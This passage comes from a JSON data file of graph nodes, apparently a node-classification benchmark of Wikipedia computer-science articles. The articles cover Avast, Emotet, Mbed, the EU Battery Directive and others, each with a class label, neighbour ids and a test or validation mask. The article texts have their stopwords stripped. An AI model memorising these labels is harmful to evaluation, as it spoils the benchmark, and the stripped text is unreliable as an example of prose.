    "text": "Avast:avast avast software s.r.o czech multinational cybersecurity software company headquartered prague czech republic researches develops computer security software machine learning artificial intelligence avast 435 million monthly active users largest market share among anti-malware application vendors worldwide january 2018 company approximately 1,700 employees across 25 offices worldwide avast founded pavel baudiš eduard kučera 1988 cooperative private company since 2010 ipo may 2018 july 2016 avast acquired competitor avg technologies 1.3 billion time avg third-ranked antivirus product dual-listed prague stock exchange london stock exchange constituent ftse 250 index avast founded eduard kučera pavel baudiš 1988 founders met research institute mathematical machines czechoslovakia studied math computer science communist party czechoslovakia would require join communist party study physics institute pavel baudiš discovered vienna virus floppy disk developed first program remove afterwards asked eduard kucera join cofounding avast cooperative cooperative originally called alwil software named avast cooperative changed joint partnership 1991 two years velvet revolution caused regime change czechoslovakia new regime severed ties soviet union reverted country economic system market economy 1995 avast employee ondřej vlček wrote first antivirus program windows 95 operating system 1990s security researchers virus bulletin security testing organization gave avast award every category tested increasing popularity software however late 1990s company struggling financially alwil rebuffed acquisition offers mcafee licensing avast antivirus engine 2001 alwil experiencing financial difficulties converted freemium model offering base avast software product cost result freemium model number users software grew one million 2004 20 million 2006 former symantec executive vince steckler appointed ceo avast 2009 2010 alwil changed name avast adopting name software raised 100 million venture capital investments following december avast filed initial public offering withdrew application following july citing changes market conditions 2012 avast fired outsourced tech support service iyogi discovered iyogi using misleading sales tactics persuade customers buy unnecessary services 2013 avast 200 million users 38 countries translated 43 languages time company 350 employees 2014 cvc capital bought interest avast undisclosed sum purchase valued avast 1 billion later year avast acquired mobile app developer inmite order build avast mobile apps additionally 2014 avast online support forum compromised exposing 400,000 names passwords email addresses 2015 avast largest share market antivirus software july 2016 avast reached agreement buy avg 1.3 billion avg large security company sold software desktops mobile devices july 2017 avast acquired uk-based piriform undisclosed sum piriform developer ccleaner shortly afterwards disclosed someone may created malicious version ccleaner backdoor hackers avast ipo london stock exchange may 2018 valued £2.4bn one uk ’ biggest technology listings ondrej vlcek assumed role ceo co-owner avast plc july 2019 day later changed annual pay 1 pledged board director compensation 100,000 charity avast develops markets business consumer security products servers desktops mobile devices company sells avast product line acquired avg-branded products late 2017 company merged avg avast business product lines working integrate corporate departments companies additionally avast developed utility software products improve battery life mobile devices cleanup unnecessary files hard drive find secure wireless networks create vpn connection internet avast avg consumer security software sold freemium model basic security features free advanced features require purchasing premium version free version also supported ads additionally avast users provide data pc mobile device avast used identify new security threats antivirus scanning browser cleanup secure browser password management network security features provided free firewall anti-spam online banking features purchased according pc pro software nag users upgrading 3 avast users pay premium version 10 us avast business product family includes features endpoint protection wi-fi security antivirus identity protection password management data protection example desktop product look vulnerabilities wi-fi network run applications suspect malicious hardware isolated sandbox avast business managed workplace monitors manages desktops assesses on-site security protocols company also sells management software administrators deploy manage avast installations pc magazine gave avast free antivirus software overall score 8.8 10 gave avg score 8.4 review said avast gets good lab test results overall many features password manager bit limited tests av-test institute avast 2017 received six six points protection usability 3.5 points performance review tom guide said free avast antivirus product good malware protection small footprint system review said avast competitive set features free antivirus product scans slow pushes users install google chrome browser avast antivirus product business users received 4 5 techradar 2017 review said software good features protection configuration excellent interface took much hard drive space n't cover mobile devices according tom guide mobile version inexpensive feature-laden features unreliable work expected pc magazine said mobile version every security feature could want difficult use avg purchased avast 2016 also generally performed well lab tests av-test institute gave avg six six points usability 5.5 points protection 5.5 points performance however avg scored 81.05 virus bulletin lab tests slightly average software good detecting malware disappointing antiphishing screening review tom hardware gave avg software seven ten stars review highlighted software small system footprint good malware protection quick scan option lacks many additional features",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      3981,
      10637,
      9488,
      10384,
      8980,
      4374,
      1052,
      156,
      6431,
      2721,
      9121,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      3243,
      6699,
      3885,
      8493,
      8615,
      6834,
      4403,
      9523,
      10166,
      7103,
      704,
      9537,
      7362,
      1475,
      10308,
      4421,
      202,
      1355,
      5069,
      10574,
      7251,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      11622,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      9341,
      2558,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 2860,
    "label": 5,
    "text": "Digital_multiplex_hierarchy:digital multiplex hierarchy telecommunications digital multiplex hierarchy hierarchy consisting ordered repetition tandem digital multiplexers produce signals successively higher data rates level hierarchy digital multiplexing hierarchies may implemented many different configurations depending number channels desired b signaling system used c bit rate allowed communications media currently available digital multiplexers designated dl- ds- m-series operate t-carrier rates design digital multiplex hierarchies care must exercised ensure interoperability multiplexers used hierarchy digroup abbreviation digital group telephony basic group digital multiplex hierarchy north american japanese t-carrier digital hierarchies digroup supports 12 pcm voice channels equivalent services ds1 line rate 2 digroups plus overhead bits 1.544 mbit/s supporting 24 voice channels equivalent services e-carrier european hierarchy digroup supports 15 pcm channels equivalent services ds1 line rate 2 digroups plus overhead bits 2.048 mbit/s supporting 30 voice channels equivalent services",
    "neighbors": [
      8192,
      1955,
      2948,
      4963,
      2994,
      3156,
      10100
    ],
    "mask": "None"
  },
  {
    "node_id": 2861,
    "label": 9,
    "text": "Music_Macro_Language:music macro language music macro language mml music description language used sequencing music computer video game systems early automatic music generation functions used arcade games used many computer sounds example early popular arcade game music circus exidy corporation 1977 boom japanese video games heralded 1978 appearance japanese game centers amusement arcades space invaders taito corporation music proprietary closed source 1978 release programmable interval timer intel significant intel 8253 mode 3 square wave generator used music kit computer mz-40k sharp corporation made japan may 1978 another micro computer basic master mb-6880 ja used 5bit d/a converter music automated reference signal also important development method generate using basic software machine assembled hitachi ltd. made japan september 1978 mz-40k featured open architecture program sources therefore kind open source software first commands classical mml appeared internal architecture sp-1002 monitor iocs sp-5001 basic operating systems mz-80k 8-bit computer made sharp corporation 1978 japan incorporated intel 8253 hardware memory mapped i/o sound-related basic statements music tempo beep classical mml used basic described mml commands supplied music statement notes specified three-octave range song sequence mono single tones old code ￣ indicates upper octave old code ＿ indicates lower octave characters cdefgab correspond scale doremi faso lassi semitone indicated following note character note names followed tone length indicated number 0-9 similarly r indicates rest also followed number 0-9 indicating length sound length internal value × tempo values.tone length demisemiquaver 0 sp-1002 internal value 1 whole note 9 sp-1002 internal value 32 music played call 0030 sp-1002 iocs program routine statements tempo n 1-9 slowest 1.tempo 4 similar t=120 popular japanese song tōryanse written using mml mz-731 sharp 1z-007b sp-5001 upper compatible modern mml originally appeared microsoft basic common early 1970s 1980s 8-bit 16-bit era japanese personal computers nec pc-6001 included microsoft basic programmable sound generator 1981 mml especially popular nec personal computers nec pc-8801 2001 release mck music creation kit software compiling mml play music nintendo entertainment system awareness use mml increased mml presently popular among japanese electronic musicians musicians create chiptunes way write music nintendo entertainment system modern mml originated sub-language basic generally included rom micro-computers codice_1 statement uses argument define string tones sound-chip played mml code simple text format whereby letters numbers used describe musical notes played addition various implementations mml add system extensions allowing parameters audio synthesis altered specialized commands simplify entry common musical figures arpeggios though many platforms feature custom extensions letter case requirements minor syntactical features vary slightly implementations fundamental syntax rules commands features define mml present whole part implementations follows addition implementations add keywords symbols system-specific enhancements extensions",
    "neighbors": [
      3266,
      3075,
      4674,
      8355,
      8900,
      9932,
      9006,
      5265,
      7538,
      6419,
      8561,
      8945,
      6333,
      9210,
      477,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 2862,
    "label": 3,
    "text": "Mbed:mbed mbed platform operating system internet-connected devices based 32-bit arm cortex-m microcontrollers devices also known internet things devices project collaboratively developed arm technology partners applications mbed platform developed using mbed online ide free online code editor compiler web browser needs installed local pc since project compiled cloud i.e remote server using armcc c/c++ compiler mbed ide provides private workspaces ability import export share code distributed mercurial version control used also code documentation generation applications developed also development environments keil µvision iar embedded workbench eclipse gcc arm embedded tools mbed os provides mbed c/c++ software platform tools creating microcontroller firmware runs iot devices consists core libraries provide microcontroller peripheral drivers networking rtos runtime environment build tools test debug scripts connections secured compatible ssl/tls librairies wolfssl supports mbed-rtos components database provides driver libraries components services connected microcontrollers build final product various hardware demo-boards mbed platform first original mbed microcontroller board mbed microcontroller board marketed mbed nxp lpc1768 demo-board based nxp microcontroller arm cortex m3 core running 96 mhz 512 kb flash 64 kb ram well several interfaces including ethernet usb device spi i2c i/o mbed microcontroller received first prize annual edn innovation awards software/embedded tools category 2010 various versions board released nxp lpc2368 arm7tdmi-s nxp lpc1768 cortex-m3 nxp lpc11u24 cortex-m0 microcontrollers mbed hardware development kit hdk designed oems provides information build custom hardware support mbed os consists interface firmware schematics used easily create development boards oem modules re-programmable products suitable production project developed arm conjunction major technology companies mbed developer community development contributions happen different levels",
    "neighbors": [
      7170,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      8250,
      8253,
      6207,
      10303,
      7745,
      7235,
      7747,
      8262,
      2635,
      99,
      8812,
      11374,
      10361,
      638,
      11391,
      644,
      6276,
      9863,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      4258,
      8355,
      4773,
      9913,
      10945,
      196,
      9928,
      2788,
      3301,
      9964,
      6391,
      3835,
      781,
      5417,
      10537,
      7983,
      7988,
      10548,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      1400,
      8058,
      392,
      1428,
      7068,
      5028,
      7077,
      9638,
      424,
      3511,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      1014,
      3575,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2863,
    "label": 5,
    "text": "Digital_transmission_group:digital transmission group telecommunication digital transmission group group digitized voice data channels bit streams combined single digital bit stream transmission communications media digital transmission groups usually categorized maximum capacity specific number channels however maximum digital transmission group capacity must equal greater sum individual multiplexer input channel capacities",
    "neighbors": [
      8192,
      4963,
      1967
    ],
    "mask": "Test"
  },
  {
    "node_id": 2864,
    "label": 1,
    "text": "Free_license:free license free license open license license agreement contains provisions allow individuals reuse another creator work giving four major freedoms without special license uses normally prohibited copyright law commercial license free licenses worldwide royalty-free non-exclusive perpetual see copyright durations free licenses often basis crowdsourcing crowdfunding projects invention term free license focus rights users connected sharing traditions hacker culture 1970s public domain software ecosystem social political free software movement since 1980 open source movement since 1990s rights codified different groups organizations different domains free software definition open source definition debian free software guidelines definition free cultural works open definition definitions transformed licenses using copyright legal mechanism since ideas free/open licenses spread different spheres society open source free culture unified free open-source movement anticopyright wikimedia foundation projects public domain advocacy groups pirate parties connected free open licenses creative commons affiliates 100 jurisdictions world eupl created european union harald welte created gpl-violations.org",
    "neighbors": [
      10756,
      10255,
      2075,
      4636,
      9245,
      4127,
      5663,
      546,
      4130,
      3114,
      9771,
      5677,
      7223,
      6718,
      3654,
      5703,
      1101,
      10317,
      4192,
      10851,
      9320,
      1646,
      5747,
      7810,
      132,
      6276,
      4752,
      10392,
      11418,
      3229,
      4777,
      9899,
      692,
      2236,
      6338,
      4301,
      8909,
      5335,
      10971,
      3296,
      9953,
      743,
      4841,
      6890,
      7913,
      237,
      6898,
      3320,
      5369,
      6910,
      292,
      7980,
      823,
      2901,
      7515,
      8033,
      10088,
      8554,
      877,
      3969,
      8582,
      10631,
      7561,
      394,
      11659,
      916,
      4011,
      1970,
      9151,
      10687,
      8644,
      7626,
      467,
      8147,
      3030,
      6622,
      8177,
      2550,
      2041
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2865,
    "label": 4,
    "text": "Emotet:emotet emotet banking trojan malware program obtains financial information injecting computer code networking stack infected microsoft windows computer allowing sensitive data stolen via transmission emotet malware also inserts software modules able steal address book data perform denial service attacks systems also functions downloader dropper banking trojans emotet evolved delivery however prominent form inserting malicious documents url links inside body email sometimes disguised invoice pdf attachment first reported germany austria switzerland 2014 united states quickly followed suit encountering emotet malware necessarily fake invoices rather malicious javascript .js files malicious .js files executed emotet malware able infect current host emotet infected host malicious file part malware able intercept log save outgoing network traffic via web browser leading sensitive data compiled access victim bank account emotet member feodo trojan family trojan malware run virtual machine environment emotet changes behavior ways intended mislead malware investigators",
    "neighbors": [
      6528,
      3462,
      6797,
      4081,
      8627,
      3994,
      7515,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 2866,
    "label": 0,
    "text": "Center_embedding:center embedding linguistics center embedding process embedding phrase middle another phrase type often leads difficulty parsing would difficult explain grammatical grounds alone frequently used example involves embedding relative clause inside another one theories natural language parsing difficulty multiple center embedding thought arise limitations human short term memory order process multiple center embeddings store many subjects order connect predicates interesting theoretical point sentences multiple center embedding grammatical unacceptable examples behind noam chomsky comment languages 'designed parsability … may say languages usable chomsky 1991 researchers peter reich came theories though single center embedding acceptable man boy kicked friend mine double center embedding linguist anne de roeck colleagues provided counter-example n't true example-sentences people know produce likely accepted de roeck et al. 1982 linguist fred karlsson provided empirical evidence 2007 maximal degree multiple center-embedding clauses exactly 3 written language provided thirteen genuine examples type various indo-european languages danish english german latin swedish real examples degree 4 recorded spoken language multiple center-embeddings even degree 2 rare practically non-existing karlsson 2007 center embedding focus science fiction novel ian watson embedding plays part ted chiang story life embedding refers types clauses occurring subordinate parts superordinate clause three types sub-clauses complement relative adverbial subordinators relative pronouns indicate sub clause used center embedding abbreviated c c contains words superordinate clause left right sub-clauses multiple center embedding type clause called self-embedding english language create infinite number sentences even though set number words grammatical rules create infinite sentences rules recursion iteration rule recursion come center embedding embedding one sentence within another sentence linguists say center embedding could go forever technically grammatically correct reader would however become confused trying keep track working memory would able store keep track information given enough time piece paper pencil reader could work information sentence made sense embedding used two clauses share common category expand sentence effective optional categories used create extensive embedding sentence brother opened window maid closed -the common category window sentence expanded become brother opened window maid closed brother opened window maid janitor uncle bill hired married closed common category sentence broken multiple sentences make sense reader brother opened window maid closed one married janitor uncle bill hired center embedded sentence difficult comprehend relative clause embedded another relative clause comprehension becomes easier types clause different -- complement clause embedded relative clause relative clause embedded complement clause example- man heard dog killed radio ran away tell sentence center embedded edge embedded depending brackets located sentence 1 joe believes mary thinks john handsome 2 cat dog man hit chased meowed sentence 1 brackets located right sentence right embedded sentence 2 brackets located inside sentence spaced throughout",
    "neighbors": [
      5399
    ],
    "mask": "Test"
  },
  {
    "node_id": 2867,
    "label": 4,
    "text": "Battery_Directive:battery directive directive 2006/66/ec european parliament council 6 september 2006 batteries accumulators waste batteries accumulators repealing directive 91/157/eec commonly known battery directive regulates manufacture disposal batteries european union aim improving environmental performance batteries accumulators batteries commonly contain hazardous elements mercury cadmium lead incinerated landfilled present risk environment human health directive 91/157/eec adopted 18 march 1991 reduce hazards harmonising eu member states laws disposal recycling batteries containing dangerous substances directive 2006/66/ec repealed directive 91/157/eec directive 2006/66/ec amended directive 2013/56/eu 20 november 2013 regards placing market portable batteries accumulators containing cadmium intended use cordless power tools button cells low mercury content repealing commission decision 2009/603/ec directive like many european compliance directives directly applicable requires legislative action european member states though european directives legislation european union member states must comply avoid legal action european commission bring bear n't however member states retain freedom means implement directive requirements battery directive objective improving environmental performance batteries regulating use certain substances manufacture batteries lead mercury cadmium etc setting standards waste management batteries many european member states passed battery waste management laws among nations belgium sweden germany austria denmark finland united kingdom netherlands france others finland denmark supported total prohibition cadmium batteries belgium sweden battery recycling rates 59 55 respectively finalisation 2006 battery directive european states specific guidelines make rules comport first western european directives dealing waste management council directive 75/442/eec 15 july 1975 waste n't mention batteries chemicals specified regulation particular categories waste later referenced battery directives legislative legal basis first version european council directive batteries accumulators 91/157/eec approved 18 march 1991 covered many battery types including industrial automotive dry-cell lead-acid alkaline nickel-cadmium nickel-metal-hydride lithium lithium-ion mercury etc first program directive set six-year duration starting 1993 1991 battery directive article 3 mi annex stated prohibition exceptions marketing since battery recycling rates 5 directive sought improve rates set recycling goals separate collection recycling provide recycling/collection information consumer responsibility providing separated recycling collection largely given manufacturers recycling requirements found articles 4 6 7 marking provisions including manufacturer responsibility marking battery products contained substances recycling information regulation met heavy resistance disputed deadlines target recycling rates implementation dates weight percentage limits applicable product groups financial responsibility public information campaigns waste management financial impact exclusions financial responsibility given small producer businesses personnel safety decreased reliability greener batteries non-environmental battery marking question automotive battery makers questioned markings batteries relating battery performance arguing quantity car battery electric current output start vehicle extreme weather good indicator battery performance poor implementation first battery directive work began new directive would emphasise battery end-of-life waste management mandated better-structured collection recycling programs also acknowledged research certain substance needed harsher complete arguably unrealistic bans thus onus everyone waste management chain producer consumer rather affecting product design substance bans manufacturers claimed unreasonable consultations revisions first battery directive started 1997 giving interested parties voice legislation policy especially assessing directive economic environmental social impact february 2003 open stakeholders consultation process started published findings online culminated meeting brussels july 2003 waters tested asking extended impact assessments different scenarios proposed ranges regulation example would impact establishing spent battery collection targets 30 80 impact separate spent battery collection 70 100 entities asked goals could met propose collection responsibility models green viewpoint perhaps conciliation committee previous directive limited scope groups side set forth reasons less stringency arguing broadening scope claimed batteries certain metals banned carte blanche waste management effort would hurt confusion perhaps inconvenience public least six drafts 2003 version equivalent second battery directive 2003 revision council directive 2003/0282/cod july 2006 conciliation agreement compromise european council european parliament came three years draft revisions welcomed entities like european portable battery association epba favoured less stringency models european compliance legislation corporation organisations like epba participates working groups members include among players legislators large enterprises—in case battery-makers—trade associations non-governmental organisations directive overall stated objective still protect public interest cleaner environment minimising negative impact environment batteries especially waste cycle depending viewpoint also something compromise 1. manufacturers distributors 3. environmental proponents recent battery directive entered force 26 september 2006 gave european member states 26 september 2008 implement national laws rules batteries art.26 – transposition nations took initiative already started programs passed laws accordance spirit specifications earlier battery directives exception button cells mercury content 2 weight 2006 battery directive restates earlier battery directive prohibition marketing batteries 0.0005 mercury 0.002 cadmium weight however exceptions exist directive also mandates symbols battery labels indicate battery chemical contents lead mercury cadmium used according directive lead content batteries longer restricted initiatives reduce heavy metal batteries promote using less toxic substances batteries dispose batteries properly via regular household waste properly separated research initiatives recycling consumers informed dangers non-compliant disposal old batteries also states must easy consumers remove batteries electronic products disposal automotive industrial batteries leaving landfills incineration prohibited directive preamble point 8 article 7 requires member states maximise separation batteries regular municipal waste requires spent batteries collected separately recycling collection targets called fewer batteries end landfills collection program found annex proposed member states set country standards using battery directive guide minimum levels levels stated terms percents prior annual sales article 3 17 states 'collection rate means given member state given calendar year percentage obtained dividing weight waste portable batteries accumulators collected accordance article 8 1 directive directive 2002/96/ec calendar year average weight portable batteries accumulators producers either sell directly end-users deliver third parties order sell end-users member state calendar year preceding two calendar years member states required provide collection sites accessible free charge public art 8 battery distributors may required provide member states discretion art 8 2 battery manufacturers may refuse take back waste batteries end-consumers irrespective chemical composition origin art 8 3 waste battery collection rate targets specified article 10 minimum targets 25 battery sales 45 battery sales 26 september 2012 2016 respectively art 10 2 collections rates monitored annually outlined annex scheme yearly reporting commission may leeway given form transitional agreements nation special circumstances art 10 4 many exclusions granted manufacturers certain product types cases batteries used safety critical-use applications e.g miners caps exemptions following still place batteries imported third countries non-discriminatory conditions included art 19 member states may use instruments like differential tax rates encourage less toxic batteries recycling art 9 member states required submit implementation reports commission every three years art 22 art 21 marking must indicate separate collections recycling heavy metal content labels state collection information chemical content batteries show symbol crossed-out wheeled recycling bin annex ii indicate battery go bin symbol size specified percent battery area largest side 3 except cylindrical batteries symbol 1.5 total surface area member states set measures effective proportionate dissuasive penalties actions comporting battery directive apprise european commission measures changes art 25 annex battery collection targets mentioned art 10 practice manufacturers batteries need make sure applied legal framework company means need check producer legal terms directive whether fulfilled labelling obligation next step manufacturers distributors define battery strategy register battery compliance schemes control battery compliance monitor recycling recovery results working within framework battery directive manufacturers producers distributors also aware financial aspects registration timelines ensure compliance reduce risks batteries time supported advice suitable qualified persons mercury-containing rechargeable battery management act 1996 similar law united states banning sale mercury-containing batteries except small button cells requiring labelling disposal recycling u.s. state california new york city require recycling rechargeable batteries along state maine require recycling cell phones similar european directives protecting environment health parallel battery directive restriction hazardous substances rohs waste electrical electronic equipment weee registration evaluation authorisation restriction chemicals reach directives",
    "neighbors": [
      6658,
      1477,
      11534,
      9499,
      3666,
      403,
      7579,
      1500
    ],
    "mask": "Test"
  },
  {
    "node_id": 2868,
    "label": 9,
    "text": "Distributed_Application_Specification_Language:distributed application specification language dasl programming language distributed application specification language high-level strongly typed programming language originally developed sun microsystems laboratories 1999 2003 part ace project goals project enable rapid development web-based applications based sun j2ee architecture eliminate steep learning curve platform-specific details dasl defines application domain model one logical presentation models logical presentation model consists choreography domain model objects described set forms attached actions dasl generates graphical user interface directly logical presentation dasl unique among modern application programming languages ability generate modern graphic user interface application without requiring programmer define user interface explicitly allowing programmer control look feel generated graphic user interface dasl language partially declarative partially procedural description object/data structures persistence description logical presentation declarative basic object constraints behavior declarative additional object behaviors specified procedurally methods queries defined either declaratively writing methods language development environment practical realization model-driven architecture mda approach programmer uses dasl produce platform-independent model pim language code generators automatically produce deploy platform-specific model psm new psms may introduced writing new code generators key benefit dasl language approach 3rd generation 3gl programming languages enterprise applications specified concise precise way expresses application logic clearly small enterprise application dasl typically implemented 8-10k lines dasl code dasl compiler typically translates 200k lines java xml sql implementation artifacts 200k line figure typical equivalent applications written using 3gls conciseness dasl seen also terms content two representations dasl vs. generated application code java/xml/sql etc. dasl code describes business logic business processes specific application independent deployment middleware frameworks presentation mechanisms core business logic typically represents 2-5 generated application code thus writing understanding maintaining application code much easier dasl level level generated code business logic scattered within various implementation artifacts another advantage using dasl write applications rather conventional 3rd generation languages ides dasl code independent middleware gui presentation frameworks network topology implementation technologies new middleware frameworks developed evolve existing dasl programs migrated without need re-implement example original dasl code generators produced traditional html screens later dasl code generators written use frameworks apache struts technologies javascript browser produce interactive experience today new dasl generators written produce rich internet applications existing dasl applications thus converted rich internet applications recompiling latest code generators dasl combines declarative syntax java-like procedural syntax declarative part language enables defining applications higher level abstraction 3rd generation languages java dasl programmer describe inter-process communication client processes web servers application servers databases details user interface desired application rather programmer describes application set related domain objects including behavior set forms actions annotated basic layout properties contrast highly specialized dsls dasl turing-complete behavior domain objects expressed using combination declarative procedural syntax example constraints objects object attributes expressed declaratively constraint defined either declarative expression procedurally dasl application two primary components business object specification bos describes object domain model consisting persistent transient objects representing domain application application usage specification aus describes actions use cases may performed domain model aus essentially choreography domain objects series forms actions dasl programmer models graphical user interface application annotating logical aus forms actions properties describe basic layout data page rather user interface considerations dominating application specification dasl logical interaction user domain model central user interface derived logical interaction believed dasl unique among languages respect dasl language described published sun labs technical report called dasl language programmer guide reference manual technical report also available part acm digital library http //dl.acm.org/citation.cfm id=1698172 dl=acm coll=dl cfid=800729170 cftoken=37871889 around 1999 two sun researchers bruce daniels bob goldberg started research project sun labs called 'ace project goal simplifying creation java web-based enterprise applications ace language known dasl developed goldberg daniels several colleagues part project ace project language featured article appeared june 2002 sun website well january 2003 edition computing research news entitled sun microsystems laboratories license innovate 'project ace ace dasl development environment demonstrated bruce daniels part james gosling keynote address javaone conference march 2002 business side sun microsystems dasl language used implement public interface sun grid compute utility known gridportal although sun microsystems release commercial implementation dasl language past made technology available selected partners conducted trials using technology dasl referenced association computing machinery portal including paper presented oopsla 2004 conference papers model-driven software development sun/oracle website describing project ace demonstration ace dasl given part james gosling keynote address 2004 java one conference research development dasl language continued rd3 software 2006 2010 rd3 language enhancements code generators dasl made language extensible broadened scope language dynamic http-style web applications rich internet applications addition producing html front ends dasl code generators created produce adobe flex flash front ends modest resources html5 could easily generated well iphone- android-specific implementations language extended define dynamic websites domain-specific web portals include cloud applications example rd3 website implemented dasl program rd3 dasl language supports concept forms nested forms part logical presentation information actions logically grouped user interface controlled using annotations presentation navigation recursive relationships organization charts family trees added language dasl language made extensible third party programmer write code generator plugin java targeted specific dasl object class form allowing object form presented using custom widget customized widgets may computation within user browser application presentation produced dasl turing complete dasl unique among modern application programming languages ability generate modern graphic user interface application without requiring programmer define user interface explicitly using simple annotations programmer modify user interface produced dasl using code generator plugins programmer extend dasl generate specific desired user interface",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2869,
    "label": 5,
    "text": "Distributed-queue_dual-bus:distributed-queue dual-bus telecommunication distributed-queue dual-bus network dqdb distributed multi-access network supports integrated communications using dual bus distributed queuing b provides access local metropolitan area networks c supports connectionless data transfer connection-oriented data transfer isochronous communications voice communications ieee 802.6 example network providing dqdb access methods dqdb medium access control mac algorithm generally credited robert newman developed algorithm phd thesis 1980s university western australia appreciate innovative value dqdb mac algorithm must seen background lan protocols time based broadcast ethernet ieee 802.3 ring like token ring ieee 802.5 fddi dqdb may thought two token rings one carrying data direction around ring improves reliability important metropolitan area networks man repairs may take longer lan wi-fi damage may inaccessible dqdb standard ieee 802.6 developed atm broadband isdn still early development strong interaction two standards atm cells dqdb frames harmonized settled essentially 48-byte data frame 5-byte header dqdb algorithm distributed queue implemented communicating queue state information via header node dqdb network maintains pair state variables represent position distributed queue size queue headers reverse bus communicated requests inserted distributed queue upstream nodes would know allow dqdb cells pass unused forward bus algorithm remarkable extreme simplicity currently dqdb systems installed many carriers entire cities lengths reach speeds ds3 line 44.736 mbit/s implementations use optical fiber length 100 km speeds around 150 mbit/s",
    "neighbors": [
      2904
    ],
    "mask": "Test"
  },
  {
    "node_id": 2870,
    "label": 7,
    "text": "Symantec_Operations_Readiness_Tools:symantec operations readiness tools march 15 2011 symantec released symantec operations readiness tools sort updated version veritas operations services vos sort formerly vos web-based suite services introduced symantec corporation 2008 supports symantec enterprise products veritas storage foundation veritas cluster server vcs netbackup sort collects environmental data aix hp-ux linux solaris windows servers sort identifies risks data centers provides remediation recommendations symantec currently charge customers sort sort uses data collector collect configuration environmental data veritas volume manager vxvm veritas file system vxfs vcs netbackup symantec enterprise products data analyzed potential problems risks summarized reports sort produces three types reports symantec enterprise products sort performs environment-specific checks produce reports risk assessment report example based 155 separate checks product licensing inventory report lists installed software binaries license keys installation upgrade report lists environment-specific prerequisites must met installing upgrading symantec enterprise products example report lists required operating system patches need installed installing symantec enterprise product risk assessment report provides environment-specific configuration assessment recommendations increase performance availability utilization example one checks risk assessment report lists volumes whose mirrors composed logical units disk array logical volumes mirrored higher availability mirrored across separate disk array controllers mirroring logical volumes across separate disk array controllers allows logical volumes continue operate one disk array fail",
    "neighbors": [
      6797,
      7955,
      10903,
      1304,
      6297,
      283,
      5924,
      1708,
      823,
      11065,
      3520,
      2378,
      8398,
      4438,
      735,
      9569,
      4194,
      5612,
      6003,
      6643,
      10872,
      8572,
      6014,
      9983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2871,
    "label": 3,
    "text": "Ultra_5/10:ultra 5/10 ultra 5 ultra 10 64-bit sun microsystems workstations based ultrasparc microprocessor line available since january 1998 last shipped november 2002 systems notable first sun workstation line introduce various commodity pc compatible hardware components ata hard disks cmd640 pci eide controller ati rage pro video chip ultra 5 came pizzabox style case 270 333 360 400-mhz ultrasparc iii cpu supported maximum 512 mb buffered edo ecc ram four 50ns 168-pin dimm slots included single eide hard disk drive 4 20 gb cd-rom drive three 32-bit 33 mhz pci slots two full-size one short graphics port hd15 parallel printer port db25 two serial ports db25 de9 ethernet port 10base-t/100base-tx headphone line-in line-out microphone 3.5-mm jacks ultra 10 came mid-tower case 300 333 360 440-mhz 64-bit ultrasparc cpu doubled supported ram maximum 1024 mb four dimm slots added room second ata hard disk fourth pci card upa graphics card creator creator3d elite3d",
    "neighbors": [
      3328,
      9731,
      1801,
      4235,
      780,
      1809,
      2710,
      1316,
      10789,
      1707,
      3247,
      6322,
      7104,
      9665,
      6338,
      10436,
      1480,
      2895,
      3919,
      597,
      10200,
      4960,
      9955,
      11363,
      11626,
      7148,
      7022,
      6129,
      8179,
      11636,
      9333,
      1399,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 2872,
    "label": 2,
    "text": "Conary_(package_manager):conary package manager conary free software package management system created rpath sas distributed terms apache license version 2.0 relicensed gplv3 2013 focuses installing packages automated dependency resolution distributed online repositories providing concise easy-to-use python-based description language specify build package used foresight linux rpath linux conary updates specific files packages need updated behavior minimizes bandwidth time requirements updating software packages conary also features rollbacks package installation well derived packages conary toolchain includes build server conary packages builds packages inside chroot environments containing package explicitly listed build requirements fundamental packages useful packagers means package builds done inside reproducible environment packagers accidentally introduce dependencies peculiarities machine environment custom configuration files undocumented extra packages",
    "neighbors": [
      5380,
      11525,
      2310,
      10760,
      2955,
      7435,
      7181,
      7947,
      9487,
      2448,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      5670,
      4775,
      7847,
      6828,
      6446,
      7983,
      1842,
      6579,
      823,
      6583,
      3131,
      5819,
      10172,
      190,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      3667,
      6227,
      4951,
      6361,
      2010,
      9564,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      6119,
      8554,
      9063,
      5356,
      9324,
      7920,
      6257,
      1138,
      1522,
      10096,
      6393,
      7293
    ],
    "mask": "Test"
  },
  {
    "node_id": 2873,
    "label": 5,
    "text": "Drop_and_insert:drop insert multichannel transmission system drop insert process diverts drop portion multiplexed aggregate signal intermediate point introduces insert different signal subsequent transmission position drop insert practiced example time-division multiplexing tdm time slot frequency band replaced another source diverted signal may demodulated reinserted another transmission system another time slot frequency band time slot frequency band vacated diverted signal need necessarily reoccupied another signal likewise previously unoccupied time slot frequency band may occupied signal inserted drop-and-insert point signals interest drop-and-insert point diverted",
    "neighbors": [
      3168
    ],
    "mask": "Test"
  },
  {
    "node_id": 2874,
    "label": 3,
